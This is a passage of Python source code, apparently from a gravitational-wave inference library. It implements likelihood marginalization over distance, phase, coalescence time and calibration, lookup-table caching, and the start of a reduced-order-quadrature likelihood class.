        """
        self.parameters.update(self.get_sky_frame_parameters())
        if signal_polarizations is None:
            signal_polarizations = \
                self.waveform_generator.frequency_domain_strain(self.parameters)
        d_inner_h, h_inner_h = self._calculate_inner_products(signal_polarizations)
        # Rescale the inner products from the current distance onto the whole
        # distance grid: <d|h> ~ 1/D, <h|h> ~ 1/D^2.
        d_inner_h_dist = (
            d_inner_h * self.parameters['luminosity_distance'] /
            self._distance_array)
        h_inner_h_dist = (
            h_inner_h * self.parameters['luminosity_distance']**2 /
            self._distance_array**2)
        if self.phase_marginalization:
            distance_log_like = (
                ln_i0(abs(d_inner_h_dist)) -
                h_inner_h_dist.real / 2
            )
        else:
            distance_log_like = (d_inner_h_dist.real - h_inner_h_dist.real / 2)
        # Posterior on the grid (max subtracted for stability), then sample.
        distance_post = (np.exp(distance_log_like - max(distance_log_like)) *
                         self.distance_prior_array)
        new_distance = Interped(
            self._distance_array, distance_post).sample()
        # Rescale the cached polarizations so downstream reconstructions
        # (e.g. phase) see the signal at the newly drawn distance.
        self._rescale_signal(signal_polarizations, new_distance)
        return new_distance
def _calculate_inner_products(self, signal_polarizations):
d_inner_h = 0
h_inner_h = 0
for interferometer in self.interferometers:
per_detector_snr = self.calculate_snrs(
signal_polarizations, interferometer)
d_inner_h += per_detector_snr.d_inner_h
h_inner_h += per_detector_snr.optimal_snr_squared
return d_inner_h, h_inner_h
    def generate_phase_sample_from_marginalized_likelihood(
            self, signal_polarizations=None):
        """
        Generate a single sample from the posterior distribution for phase when
        using a likelihood which explicitly marginalises over phase.
        See Eq. (C29-C32) of https://arxiv.org/abs/1809.02293
        Parameters
        ==========
        signal_polarizations: dict, optional
            Polarizations modes of the template.
        Returns
        =======
        new_phase: float
            Sample from the phase posterior.
        Notes
        =====
        This is only valid when the waveform phase dependence is
        mu(phi) proportional to exp(-2i phi), i.e. (2,2)-mode dominated.
        """
        self.parameters.update(self.get_sky_frame_parameters())
        if signal_polarizations is None:
            signal_polarizations = \
                self.waveform_generator.frequency_domain_strain(self.parameters)
        d_inner_h, h_inner_h = self._calculate_inner_products(signal_polarizations)
        # Evaluate ln L on a uniform phase grid and sample from the
        # interpolated (unnormalized) posterior.
        phases = np.linspace(0, 2 * np.pi, 101)
        phasor = np.exp(-2j * phases)
        phase_log_post = d_inner_h * phasor - h_inner_h / 2
        phase_post = np.exp(phase_log_post.real - max(phase_log_post.real))
        new_phase = Interped(phases, phase_post).sample()
        return new_phase
def distance_marginalized_likelihood(self, d_inner_h, h_inner_h):
d_inner_h_ref, h_inner_h_ref = self._setup_rho(
d_inner_h, h_inner_h)
if self.phase_marginalization:
d_inner_h_ref = np.abs(d_inner_h_ref)
else:
d_inner_h_ref = np.real(d_inner_h_ref)
return self._interp_dist_margd_loglikelihood(
d_inner_h_ref, h_inner_h_ref)
def phase_marginalized_likelihood(self, d_inner_h, h_inner_h):
d_inner_h = ln_i0(abs(d_inner_h))
if self.calibration_marginalization and self.time_marginalization:
return d_inner_h - np.outer(h_inner_h, np.ones(np.shape(d_inner_h)[1])) / 2
else:
return d_inner_h - h_inner_h / 2
    def time_marginalized_likelihood(self, d_inner_h_tc_array, h_inner_h):
        """Numerically marginalize the likelihood over coalescence time.

        Computes per-time log likelihoods (optionally distance/phase
        marginalized) then sums them weighted by the time prior via
        logsumexp.
        """
        if self.distance_marginalization:
            log_l_tc_array = self.distance_marginalized_likelihood(
                d_inner_h=d_inner_h_tc_array, h_inner_h=h_inner_h)
        elif self.phase_marginalization:
            log_l_tc_array = self.phase_marginalized_likelihood(
                d_inner_h=d_inner_h_tc_array,
                h_inner_h=h_inner_h)
        else:
            log_l_tc_array = np.real(d_inner_h_tc_array) - h_inner_h / 2
        times = self._times
        if self.jitter_time:
            times = self._times + self.parameters['time_jitter']
        # Prior weight per grid point; _delta_tc is the grid spacing.
        time_prior_array = self.priors['geocent_time'].prob(times) * self._delta_tc
        return logsumexp(log_l_tc_array, b=time_prior_array)
    def time_and_calibration_marginalized_likelihood(self, d_inner_h_array, h_inner_h):
        """Jointly marginalize over coalescence time and calibration draws.

        The (draws x times) log-likelihood matrix is reduced with logsumexp
        using weights = time prior x uniform weight over draws.
        """
        times = self._times
        if self.jitter_time:
            times = self._times + self.parameters['time_jitter']
        _time_prior = self.priors['geocent_time']
        # Restrict the grid to the prior support before weighting.
        time_mask = np.logical_and((times >= _time_prior.minimum), (times <= _time_prior.maximum))
        times = times[time_mask]
        time_probs = self.priors['geocent_time'].prob(times) * self._delta_tc
        d_inner_h_array = d_inner_h_array[:, time_mask]
        h_inner_h = h_inner_h
        if self.distance_marginalization:
            log_l_array = self.distance_marginalized_likelihood(
                d_inner_h=d_inner_h_array, h_inner_h=h_inner_h)
        elif self.phase_marginalization:
            log_l_array = self.phase_marginalized_likelihood(
                d_inner_h=d_inner_h_array,
                h_inner_h=h_inner_h)
        else:
            # Broadcast the per-draw <h|h> across the time axis.
            log_l_array = np.real(d_inner_h_array) - np.outer(h_inner_h, np.ones(np.shape(d_inner_h_array)[1])) / 2
        # (draws x times) weight matrix: each draw carries equal weight.
        prior_array = np.outer(time_probs, 1. / self.number_of_response_curves * np.ones(len(h_inner_h))).T
        return logsumexp(log_l_array, b=prior_array)
    def get_calibration_log_likelihoods(self, signal_polarizations=None):
        """Return the log likelihood for each calibration response draw.

        Accumulates per-draw <d|h> and <h|h> over detectors, then applies
        any enabled distance/phase marginalization per draw.
        """
        self.parameters.update(self.get_sky_frame_parameters())
        if signal_polarizations is None:
            signal_polarizations =\
                self.waveform_generator.frequency_domain_strain(self.parameters)
        d_inner_h = 0.
        optimal_snr_squared = 0.
        complex_matched_filter_snr = 0.
        d_inner_h_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
        optimal_snr_squared_array = np.zeros(self.number_of_response_curves, dtype=np.complex128)
        for interferometer in self.interferometers:
            per_detector_snr = self.calculate_snrs(
                waveform_polarizations=signal_polarizations,
                interferometer=interferometer)
            d_inner_h += per_detector_snr.d_inner_h
            optimal_snr_squared += np.real(per_detector_snr.optimal_snr_squared)
            complex_matched_filter_snr += per_detector_snr.complex_matched_filter_snr
            d_inner_h_array += per_detector_snr.d_inner_h_array
            optimal_snr_squared_array += per_detector_snr.optimal_snr_squared_array
        if self.distance_marginalization:
            log_l_cal_array = self.distance_marginalized_likelihood(
                d_inner_h=d_inner_h_array, h_inner_h=optimal_snr_squared_array)
        elif self.phase_marginalization:
            log_l_cal_array = self.phase_marginalized_likelihood(
                d_inner_h=d_inner_h_array,
                h_inner_h=optimal_snr_squared_array)
        else:
            log_l_cal_array = np.real(d_inner_h_array - optimal_snr_squared_array / 2)
        return log_l_cal_array
def calibration_marginalized_likelihood(self, d_inner_h_calibration_array, h_inner_h):
if self.distance_marginalization:
log_l_cal_array = self.distance_marginalized_likelihood(
d_inner_h=d_inner_h_calibration_array, h_inner_h=h_inner_h)
elif self.phase_marginalization:
log_l_cal_array = self.phase_marginalized_likelihood(
d_inner_h=d_inner_h_calibration_array,
h_inner_h=h_inner_h)
else:
log_l_cal_array = np.real(d_inner_h_calibration_array - h_inner_h / 2)
return logsumexp(log_l_cal_array) - np.log(self.number_of_response_curves)
def _setup_rho(self, d_inner_h, optimal_snr_squared):
    """Rescale the inner products from the sampled luminosity distance to the
    reference distance ``self._ref_dist``.

    (h|h) scales as 1/d^2 and (d|h) as 1/d, so the reference-distance values
    are obtained by multiplying by (d_L/d_ref)^2 and (d_L/d_ref) respectively.

    Returns
    =======
    tuple: (d_inner_h_ref, optimal_snr_squared_ref)
    """
    optimal_snr_squared_ref = (optimal_snr_squared.real *
                               self.parameters['luminosity_distance'] ** 2 /
                               self._ref_dist ** 2.)
    d_inner_h_ref = (d_inner_h * self.parameters['luminosity_distance'] /
                     self._ref_dist)
    return d_inner_h_ref, optimal_snr_squared_ref
def log_likelihood(self):
    """Return the full log likelihood: likelihood ratio plus noise evidence."""
    ratio = self.log_likelihood_ratio()
    return ratio + self.noise_log_likelihood()
@property
def _delta_distance(self):
    """Grid spacing of the distance array (computed from the first two
    points, so a uniform grid is assumed)."""
    return self._distance_array[1] - self._distance_array[0]
@property
def _dist_multiplier(self):
    """Maximum value of ref_dist / dist_array, attained at the minimum
    distance in the grid."""
    return self._ref_dist / self._distance_array[0]
@property
def _optimal_snr_squared_ref_array(self):
    """Optimal filter snr at fiducial distance of ref_dist Mpc.

    Log-spaced grid spanning 1e-5 to 1e10 with one point per row of the
    distance-marginalization lookup table.
    """
    return np.logspace(-5, 10, self._dist_margd_loglikelihood_array.shape[0])
@property
def _d_inner_h_ref_array(self):
    """Matched filter snr at fiducial distance of ref_dist Mpc.

    With phase marginalization (d|h) only enters through its absolute value
    (see the ln_i0(abs(...)) call in the lookup-table build), so a positive
    log-spaced grid suffices; otherwise the grid also covers negative values.
    """
    if self.phase_marginalization:
        return np.logspace(-5, 10, self._dist_margd_loglikelihood_array.shape[1])
    else:
        # Half the columns cover negative values, the rest positive.
        n_negative = self._dist_margd_loglikelihood_array.shape[1] // 2
        n_positive = self._dist_margd_loglikelihood_array.shape[1] - n_negative
        return np.hstack((
            -np.logspace(3, -3, n_negative), np.logspace(-3, 10, n_positive)
        ))
def _setup_distance_marginalization(self, lookup_table=None):
    """Prepare the distance-marginalization lookup table and its interpolant.

    Parameters
    ==========
    lookup_table: str, dict, None
        Either a filename to load a cached table from (or None for the
        default cache location), or an already-loaded table dict.
    """
    if isinstance(lookup_table, str) or lookup_table is None:
        self.cached_lookup_table_filename = lookup_table
        lookup_table = self.load_lookup_table(
            self.cached_lookup_table_filename)
    if isinstance(lookup_table, dict):
        # _test_cached_lookup_table returns a (match, failed_key) tuple and a
        # tuple is always truthy, so it must be unpacked before testing;
        # previously a mismatched table passed in as a dict was silently
        # accepted.
        match, _ = self._test_cached_lookup_table(lookup_table)
        if match:
            self._dist_margd_loglikelihood_array = lookup_table[
                'lookup_table']
        else:
            self._create_lookup_table()
    else:
        self._create_lookup_table()
    # 2D interpolant over the (d|h, h|h) reference grids; -inf outside.
    self._interp_dist_margd_loglikelihood = UnsortedInterp2d(
        self._d_inner_h_ref_array, self._optimal_snr_squared_ref_array,
        self._dist_margd_loglikelihood_array, kind='cubic', fill_value=-np.inf)
@property
def cached_lookup_table_filename(self):
    """Filename used to cache the distance-marginalization lookup table.

    Lazily falls back to '.distance_marginalization_lookup.npz' when no
    filename has been set.
    """
    filename = self._lookup_table_filename
    if filename is None:
        filename = '.distance_marginalization_lookup.npz'
        self._lookup_table_filename = filename
    return filename
@cached_lookup_table_filename.setter
def cached_lookup_table_filename(self, filename):
    """Set the cache filename, appending '.npz' when missing.

    Non-string values (e.g. None) are ignored, leaving the lazy default of
    the getter in place.
    """
    if isinstance(filename, str):
        if not filename.endswith('.npz'):
            filename += '.npz'
        self._lookup_table_filename = filename
def load_lookup_table(self, filename):
    """Load a cached distance-marginalization lookup table.

    Parameters
    ==========
    filename: str
        Path of the ``.npz`` file to read.

    Returns
    =======
    dict or None: the loaded table when the file exists and matches the
        current settings, otherwise None.
    """
    if os.path.exists(filename):
        try:
            loaded_file = dict(np.load(filename))
        except AttributeError as e:
            # Unreadable/incompatible file: rebuild the table from scratch.
            # NOTE(review): the caller rebuilds again when None is returned,
            # so the table may be computed twice on this path — confirm.
            logger.warning(e)
            self._create_lookup_table()
            return None
        match, failure = self._test_cached_lookup_table(loaded_file)
        if match:
            logger.info('Loaded distance marginalisation lookup table from '
                        '{}.'.format(filename))
            return loaded_file
        else:
            # Mismatched settings: fall through and return None so the
            # caller rebuilds the table.
            logger.info('Loaded distance marginalisation lookup table does '
                        'not match for {}.'.format(failure))
    elif isinstance(filename, str):
        logger.info('Distance marginalisation file {} does not '
                    'exist'.format(filename))
    return None
def cache_lookup_table(self):
    """Write the lookup table and the settings it was built with to the
    cache file, so later runs can validate and reuse it."""
    contents = dict(
        distance_array=self._distance_array,
        prior_array=self.distance_prior_array,
        lookup_table=self._dist_margd_loglikelihood_array,
        reference_distance=self._ref_dist,
        phase_marginalization=self.phase_marginalization,
    )
    np.savez(self.cached_lookup_table_filename, **contents)
def _test_cached_lookup_table(self, loaded_file):
    """Check whether a loaded lookup table matches the current settings.

    Parameters
    ==========
    loaded_file: dict
        Contents of a cached lookup-table file.

    Returns
    =======
    tuple: (match, failure) where ``match`` is a bool and ``failure`` is the
        first mismatched key (None when everything matches). Callers must
        unpack the tuple — the tuple itself is always truthy.
    """
    pairs = dict(
        distance_array=self._distance_array,
        prior_array=self.distance_prior_array,
        reference_distance=self._ref_dist,
        phase_marginalization=self.phase_marginalization)
    for key in pairs:
        if key not in loaded_file:
            return False, key
        elif not np.array_equal(np.atleast_1d(loaded_file[key]),
                                np.atleast_1d(pairs[key])):
            return False, key
    return True, None
def _create_lookup_table(self):
    """Build the distance-marginalized log-likelihood lookup table over the
    reference (h|h) x (d|h) grids and cache it to disk."""
    from tqdm.auto import tqdm
    logger.info('Building lookup table for distance marginalisation.')
    # Rows index the (h|h) grid, columns the (d|h) grid.
    self._dist_margd_loglikelihood_array = np.zeros((400, 800))
    # (d|h) scales as 1/d and (h|h) as 1/d^2 relative to the reference
    # distance, so each reference value maps to a curve over the distances.
    scaling = self._ref_dist / self._distance_array
    d_inner_h_array_full = np.outer(self._d_inner_h_ref_array, scaling)
    h_inner_h_array_full = np.outer(self._optimal_snr_squared_ref_array, scaling ** 2)
    if self.phase_marginalization:
        # Phase-marginalized (d|h): log of the Bessel function I0(|d|h|).
        d_inner_h_array_full = ln_i0(abs(d_inner_h_array_full))
    # Prior probability mass per distance grid point.
    prior_term = self.distance_prior_array * self._delta_distance
    for ii, optimal_snr_squared_array in tqdm(
        enumerate(h_inner_h_array_full), total=len(self._optimal_snr_squared_ref_array)
    ):
        for jj, d_inner_h_array in enumerate(d_inner_h_array_full):
            # Marginalize over distance: prior-weighted logsumexp of the
            # per-distance log likelihood.
            self._dist_margd_loglikelihood_array[ii][jj] = logsumexp(
                d_inner_h_array - optimal_snr_squared_array / 2,
                b=prior_term
            )
    # Normalisation: log of the integral of the distance prior (the
    # 0 / distance_array term is just a zero array of the right shape).
    log_norm = logsumexp(
        0 / self._distance_array, b=self.distance_prior_array * self._delta_distance
    )
    self._dist_margd_loglikelihood_array -= log_norm
    self.cache_lookup_table()
def _setup_phase_marginalization(self, min_bound=-5, max_bound=10):
    """Deprecated no-op retained for backward compatibility.

    Only emits a deprecation warning; the bounds arguments are unused.
    """
    logger.warning(
        "The _setup_phase_marginalization method is deprecated and will be removed, "
        "please update the implementation of phase marginalization "
        "to use bilby.gw.utils.ln_i0"
    )
@staticmethod
def _bessel_function_interped(xx):
    """Deprecated: returns ln(I0(xx)) + xx via bilby.gw.utils.ln_i0."""
    logger.warning(
        "The _bessel_function_interped method is deprecated and will be removed, "
        "please update the implementation of phase marginalization "
        "to use bilby.gw.utils.ln_i0"
    )
    return ln_i0(xx) + xx
def _setup_time_marginalization(self):
    """Build the coalescence-time grid and prior weights used for time
    marginalization."""
    # Time-grid spacing: two strain samples per grid point.
    self._delta_tc = 2 / self.waveform_generator.sampling_frequency
    # Candidate coalescence times across the data segment; the leading
    # point is dropped so the grid has duration/delta_tc samples.
    self._times = \
        self.interferometers.start_time + np.linspace(
            0, self.interferometers.duration,
            int(self.interferometers.duration / 2 *
                self.waveform_generator.sampling_frequency + 1))[1:]
    # Prior probability mass associated with each time sample.
    self.time_prior_array = \
        self.priors['geocent_time'].prob(self._times) * self._delta_tc
def _setup_calibration_marginalization(self, calibration_lookup_table):
    """Draw or load the calibration response curves for each detector.

    For every interferometer the recalibration priors are moved out of
    ``self.priors`` (replaced by delta functions at zero) and a set of
    ``number_of_response_curves`` frequency-dependent calibration factors is
    either read from a lookup file or drawn from those priors and cached.

    Parameters
    ==========
    calibration_lookup_table: dict or None
        Mapping from detector name to calibration file; missing entries
        default to '{name}_calibration_file.h5'.
    """
    if calibration_lookup_table is None:
        calibration_lookup_table = {}
    self.calibration_draws = {}
    self.calibration_abs_draws = {}
    self.calibration_parameter_draws = {}
    for interferometer in self.interferometers:
        # Force the priors: keep the recalibration priors only for the
        # draws below; sampling sees delta functions at zero.
        calibration_priors = PriorDict()
        for key in self.priors.keys():
            if 'recalib' in key and interferometer.name in key:
                calibration_priors[key] = copy.copy(self.priors[key])
                self.priors[key] = DeltaFunction(0.0)
        # If there is no entry in the lookup table, make an empty one
        if interferometer.name not in calibration_lookup_table.keys():
            calibration_lookup_table[interferometer.name] = \
                f'{interferometer.name}_calibration_file.h5'
        # If the interferometer lookup table file exists, generate the curves from it
        if os.path.exists(calibration_lookup_table[interferometer.name]):
            self.calibration_draws[interferometer.name] = \
                calibration.read_calibration_file(
                    calibration_lookup_table[interferometer.name], self.interferometers.frequency_array,
                    self.number_of_response_curves, self.starting_index)
        else:  # generate the fake curves
            from tqdm.auto import tqdm
            self.calibration_parameter_draws[interferometer.name] = \
                pd.DataFrame(calibration_priors.sample(self.number_of_response_curves))
            self.calibration_draws[interferometer.name] = \
                np.zeros((self.number_of_response_curves, len(interferometer.frequency_array)), dtype=complex)
            for i in tqdm(range(self.number_of_response_curves)):
                self.calibration_draws[interferometer.name][i, :] = \
                    interferometer.calibration_model.get_calibration_factor(
                        interferometer.frequency_array,
                        prefix='recalib_{}_'.format(interferometer.name),
                        **self.calibration_parameter_draws[interferometer.name].iloc[i])
            # Cache the draws so later runs can reuse them.
            calibration.write_calibration_file(
                calibration_lookup_table[interferometer.name],
                self.interferometers.frequency_array,
                self.calibration_draws[interferometer.name],
                self.calibration_parameter_draws[interferometer.name])
        # The stored draws replace the parameterised calibration model.
        interferometer.calibration_model = calibration.Recalibrate()
        # Restrict the curves to the analysed frequency band and precompute
        # |C|^2 for the (h|h) terms.
        _mask = interferometer.frequency_mask
        self.calibration_draws[interferometer.name] = self.calibration_draws[interferometer.name][:, _mask]
        self.calibration_abs_draws[interferometer.name] = \
            np.abs(self.calibration_draws[interferometer.name])**2
@property
def interferometers(self):
    """InterferometerList of the detectors used in this analysis."""
    return self._interferometers

@interferometers.setter
def interferometers(self, interferometers):
    # Coerce any iterable of interferometers/names into an InterferometerList.
    self._interferometers = InterferometerList(interferometers)
def _rescale_signal(self, signal, new_distance):
    """Rescale the waveform polarizations in place from the reference
    distance to ``new_distance`` (amplitude scales as 1/distance)."""
    for mode in signal:
        signal[mode] *= self._ref_dist / new_distance
@property
def reference_frame(self):
    """The sky-location reference frame: "sky" or a two-detector list."""
    return self._reference_frame
@property
def _reference_frame_str(self):
    """String form of the reference frame for metadata, e.g. "sky" or
    the concatenated detector names ("H1L1")."""
    if isinstance(self.reference_frame, str):
        return self.reference_frame
    else:
        return "".join([ifo.name for ifo in self.reference_frame])
@reference_frame.setter
def reference_frame(self, frame):
    """Set the reference frame.

    Accepts "sky", an InterferometerList, a list of detectors/names, or a
    string of concatenated detector prefixes such as "H1L1".

    Raises
    ======
    ValueError: when the frame cannot be parsed.
    """
    if frame == "sky":
        self._reference_frame = frame
    elif isinstance(frame, InterferometerList):
        # Only the first two detectors define the frame.
        self._reference_frame = frame[:2]
    elif isinstance(frame, list):
        self._reference_frame = InterferometerList(frame[:2])
    elif isinstance(frame, str):
        # Assumes a 4-character string of two 2-character detector
        # prefixes (e.g. "H1L1") — TODO confirm shorter strings are invalid.
        self._reference_frame = InterferometerList([frame[:2], frame[2:4]])
    else:
        raise ValueError("Unable to parse reference frame {}".format(frame))
def get_sky_frame_parameters(self):
    """Convert the sampled sky parameters to RA/dec and geocenter time.

    When sampling in a detector-based frame, (zenith, azimuth) are mapped to
    (ra, dec); when the time reference is a detector, its arrival time is
    mapped back to the geocenter time.

    Returns
    =======
    dict: with keys ``ra``, ``dec`` and ``geocent_time``.
    """
    time = self.parameters['{}_time'.format(self.time_reference)]
    if not self.reference_frame == "sky":
        ra, dec = zenith_azimuth_to_ra_dec(
            self.parameters['zenith'], self.parameters['azimuth'],
            time, self.reference_frame)
    else:
        ra = self.parameters["ra"]
        dec = self.parameters["dec"]
    if "geocent" not in self.time_reference:
        # Undo the detector time delay to recover the geocenter time.
        geocent_time = (
            time - self.reference_ifo.time_delay_from_geocenter(
                ra=ra, dec=dec, time=time
            )
        )
    else:
        geocent_time = self.parameters["geocent_time"]
    return dict(ra=ra, dec=dec, geocent_time=geocent_time)
@property
def lal_version(self):
    """Version string for lal, or "N/A" when lal is unavailable."""
    try:
        from lal import git_version, __version__
    except ImportError:
        return "N/A"
    try:
        version = str(__version__)
        logger.info("Using lal version {}".format(version))
        git_msg = str(git_version.verbose_msg).replace("\n", ";")
        logger.info("Using lal git version {}".format(git_msg))
        return "lal_version={}, lal_git_version={}".format(version, git_msg)
    except AttributeError:
        return "N/A"
@property
def lalsimulation_version(self):
    """Version string for lalsimulation, or "N/A" when it is unavailable."""
    try:
        from lalsimulation import git_version, __version__
    except ImportError:
        return "N/A"
    try:
        version = str(__version__)
        logger.info("Using lalsimulation version {}".format(version))
        git_msg = str(git_version.verbose_msg).replace("\n", ";")
        logger.info("Using lalsimulation git version {}".format(git_msg))
        return "lalsimulation_version={}, lalsimulation_git_version={}".format(version, git_msg)
    except AttributeError:
        return "N/A"
@property
def meta_data(self):
    """Dictionary summarising the likelihood configuration (marginalization
    flags, waveform-generator settings, frame/time references and library
    versions) for result metadata."""
    generator = self.waveform_generator
    return {
        'interferometers': self.interferometers.meta_data,
        'time_marginalization': self.time_marginalization,
        'phase_marginalization': self.phase_marginalization,
        'distance_marginalization': self.distance_marginalization,
        'calibration_marginalization': self.calibration_marginalization,
        'waveform_generator_class': generator.__class__,
        'waveform_arguments': generator.waveform_arguments,
        'frequency_domain_source_model': generator.frequency_domain_source_model,
        'parameter_conversion': generator.parameter_conversion,
        'sampling_frequency': generator.sampling_frequency,
        'duration': generator.duration,
        'start_time': generator.start_time,
        'time_reference': self.time_reference,
        'reference_frame': self._reference_frame_str,
        'lal_version': self.lal_version,
        'lalsimulation_version': self.lalsimulation_version,
    }
class BasicGravitationalWaveTransient(Likelihood):
    """Minimal frequency-domain gravitational-wave transient likelihood.

    No distance, phase, or time marginalization is performed.
    """

    def __init__(self, interferometers, waveform_generator):
        """
        Parameters
        ==========
        interferometers: list
            `bilby.gw.detector.Interferometer` instances holding the detector
            data and power spectral densities.
        waveform_generator: bilby.gw.waveform_generator.WaveformGenerator
            Computes the frequency-domain strain of the signal for a given
            set of parameters.
        """
        super(BasicGravitationalWaveTransient, self).__init__(dict())
        self.interferometers = interferometers
        self.waveform_generator = waveform_generator

    def __repr__(self):
        template = '(interferometers={},\n\twaveform_generator={})'
        return self.__class__.__name__ + template.format(
            self.interferometers, self.waveform_generator)

    def noise_log_likelihood(self):
        """Real part of the noise (no-signal) log likelihood.

        Returns
        =======
        float: the real part of the noise log likelihood.
        """
        duration = self.waveform_generator.duration
        total = -sum(
            2. / duration * np.sum(
                abs(ifo.frequency_domain_strain) ** 2 /
                ifo.power_spectral_density_array)
            for ifo in self.interferometers)
        return total.real

    def log_likelihood(self):
        """Real part of the log likelihood for the current parameters.

        Returns
        =======
        float: the real part of the log likelihood.
        """
        polarizations = self.waveform_generator.frequency_domain_strain(
            self.parameters.copy())
        if polarizations is None:
            return np.nan_to_num(-np.inf)
        total = sum(
            self.log_likelihood_interferometer(polarizations, ifo)
            for ifo in self.interferometers)
        return total.real

    def log_likelihood_interferometer(self, waveform_polarizations,
                                      interferometer):
        """Real part of the log likelihood for a single interferometer.

        Parameters
        ==========
        waveform_polarizations: dict
            Polarization mode -> frequency-domain strain.
        interferometer: bilby.gw.detector.Interferometer
            The detector to evaluate the log likelihood for.

        Returns
        =======
        float: the real part of the per-detector log likelihood.
        """
        signal_ifo = interferometer.get_detector_response(
            waveform_polarizations, self.parameters)
        residual = interferometer.frequency_domain_strain - signal_ifo
        log_l = -2. / self.waveform_generator.duration * np.vdot(
            residual, residual / interferometer.power_spectral_density_array)
        return log_l.real
class ROQGravitationalWaveTransient(GravitationalWaveTransient):
    """A reduced order quadrature likelihood object

    This uses the method described in Smith et al., (2016) Phys. Rev. D 94,
    044031. A public repository of the ROQ data is available from
    https://git.ligo.org/lscsoft/ROQ_data.

    Parameters
    ==========
    interferometers: list, bilby.gw.detector.InterferometerList
        A list of `bilby.detector.Interferometer` instances - contains the
        detector data and power spectral densities
    waveform_generator: `bilby.waveform_generator.WaveformGenerator`
        An object which computes the frequency-domain strain of the signal,
        given some set of parameters
    linear_matrix: str, array_like
        Either a string pointing to the file from which to load the
        linear_matrix array, or the array itself.
    quadratic_matrix: str, array_like
        Either a string pointing to the file from which to load the
        quadratic_matrix array, or the array itself.
    roq_params: str, array_like
        Parameters describing the domain of validity of the ROQ basis.
    roq_params_check: bool
        If true, run tests using the roq_params to check the prior and data are
        valid for the ROQ
    roq_scale_factor: float
        The ROQ scale factor used.
    priors: dict, bilby.prior.PriorDict
        A dictionary of priors containing at least the geocent_time prior
        Warning: when using marginalisation the dict is overwritten which will change the
        the dict you are passing in. If this behaviour is undesired, pass `priors.copy()`.
    distance_marginalization_lookup_table: (dict, str), optional
        If a dict, dictionary containing the lookup_table, distance_array,
        (distance) prior_array, and reference_distance used to construct
        the table.
        If a string the name of a file containing these quantities.
        The lookup table is stored after construction in either the
        provided string or a default location:
        '.distance_marginalization_lookup_dmin{}_dmax{}_n{}.npz'
    reference_frame: (str, bilby.gw.detector.InterferometerList, list), optional
        Definition of the reference frame for the sky location.
        - "sky": sample in RA/dec, this is the default
        - e.g., "H1L1", ["H1", "L1"], InterferometerList(["H1", "L1"]):
          sample in azimuth and zenith, `azimuth` and `zenith` defined in the
          frame where the z-axis is aligned the the vector connecting H1
          and L1.
    time_reference: str, optional
        Name of the reference for the sampled time parameter.
        - "geocent"/"geocenter": sample in the time at the Earth's center,
          this is the default
        - e.g., "H1": sample in the time of arrival at H1
    """

    def __init__(
        self, interferometers, waveform_generator, priors,
        weights=None, linear_matrix=None, quadratic_matrix=None,
        roq_params=None, roq_params_check=True, roq_scale_factor=1,
        distance_marginalization=False, phase_marginalization=False,
        distance_marginalization_lookup_table=None,
        reference_frame="sky", time_reference="geocenter"
    ):
        # Time and calibration marginalization are not supported with ROQ;
        # time jittering is disabled accordingly.
        super(ROQGravitationalWaveTransient, self).__init__(
            interferometers=interferometers,
            waveform_generator=waveform_generator, priors=priors,
            distance_marginalization=distance_marginalization,
            phase_marginalization=phase_marginalization,
            time_marginalization=False,
            distance_marginalization_lookup_table=distance_marginalization_lookup_table,
            jitter_time=False,
            reference_frame=reference_frame,
            time_reference=time_reference
        )
        self.roq_params_check = roq_params_check
        self.roq_scale_factor = roq_scale_factor
        # roq_params may be given directly as a structured array or loaded
        # from a whitespace-delimited file with a header row.
        if isinstance(roq_params, np.ndarray) or roq_params is None:
            self.roq_params = roq_params
        elif isinstance(roq_params, str):
            self.roq_params_file = roq_params
            self.roq_params = np.genfromtxt(roq_params, names=True)
        else:
            raise TypeError("roq_params should be array or str")
        # Weights can be passed pre-computed (dict), loaded from file (str),
        # or computed below from the basis matrices.
        if isinstance(weights, dict):
            self.weights = weights
        elif isinstance(weights, str):
            self.weights = self.load_weights(weights)
        else:
            self.weights = dict()
        if isinstance(linear_matrix, str):
            logger.info(
                "Loading linear matrix from {}".format(linear_matrix))
            linear_matrix = np.load(linear_matrix).T
        if isinstance(quadratic_matrix, str):
            logger.info(
                "Loading quadratic_matrix from {}".format(quadratic_matrix))
            quadratic_matrix = np.load(quadratic_matrix).T
        # NOTE(review): _set_weights is invoked even when pre-computed
        # weights were supplied above — confirm the basis matrices are
        # really required in that case.
        self._set_weights(linear_matrix=linear_matrix,
                          quadratic_matrix=quadratic_matrix)
        self.frequency_nodes_linear = \
            waveform_generator.waveform_arguments['frequency_nodes_linear']
        self.frequency_nodes_quadratic = \
            waveform_generator.waveform_arguments['frequency_nodes_quadratic']
def calculate_snrs(self, waveform_polarizations, interferometer):
    """
    Compute the snrs for ROQ

    Parameters
    ==========
    waveform_polarizations: waveform
        Dict with 'linear' and 'quadratic' entries, each containing the plus
        and cross polarizations evaluated at the respective ROQ frequency
        nodes.
    interferometer: bilby.gw.detector.Interferometer
        The detector to compute the SNR quantities for.

    Returns
    =======
    _CalculatedSNRs containing (d|h), (h|h) and the complex matched-filter
    SNR for this detector.
    """
    f_plus = interferometer.antenna_response(
        self.parameters['ra'], self.parameters['dec'],
        self.parameters['geocent_time'], self.parameters['psi'], 'plus')
    f_cross = interferometer.antenna_response(
        self.parameters['ra'], self.parameters['dec'],
        self.parameters['geocent_time'], self.parameters['psi'], 'cross')
    dt = interferometer.time_delay_from_geocenter(
        self.parameters['ra'], self.parameters['dec'],
        self.parameters['geocent_time'])
    # Arrival time at this detector relative to the segment start.
    dt_geocent = self.parameters['geocent_time'] - interferometer.strain_data.start_time
    ifo_time = dt_geocent + dt
    calib_linear = interferometer.calibration_model.get_calibration_factor(
        self.frequency_nodes_linear,
        prefix='recalib_{}_'.format(interferometer.name), **self.parameters)
    calib_quadratic = interferometer.calibration_model.get_calibration_factor(
        self.frequency_nodes_quadratic,
        prefix='recalib_{}_'.format(interferometer.name), **self.parameters)
    # Detector responses at the linear/quadratic basis nodes, including the
    # calibration factors.
    h_plus_linear = f_plus * waveform_polarizations['linear']['plus'] * calib_linear
    h_cross_linear = f_cross * waveform_polarizations['linear']['cross'] * calib_linear
    h_plus_quadratic = (
        f_plus * waveform_polarizations['quadratic']['plus'] * calib_quadratic)
    h_cross_quadratic = (
        f_cross * waveform_polarizations['quadratic']['cross'] * calib_quadratic)
    # (d|h) is evaluated on a 5-point stencil of precomputed time samples
    # and interpolated to the exact arrival time below.
    indices, in_bounds = self._closest_time_indices(
        ifo_time, self.weights['time_samples'])
    if not in_bounds:
        logger.debug("SNR calculation error: requested time at edge of ROQ time samples")
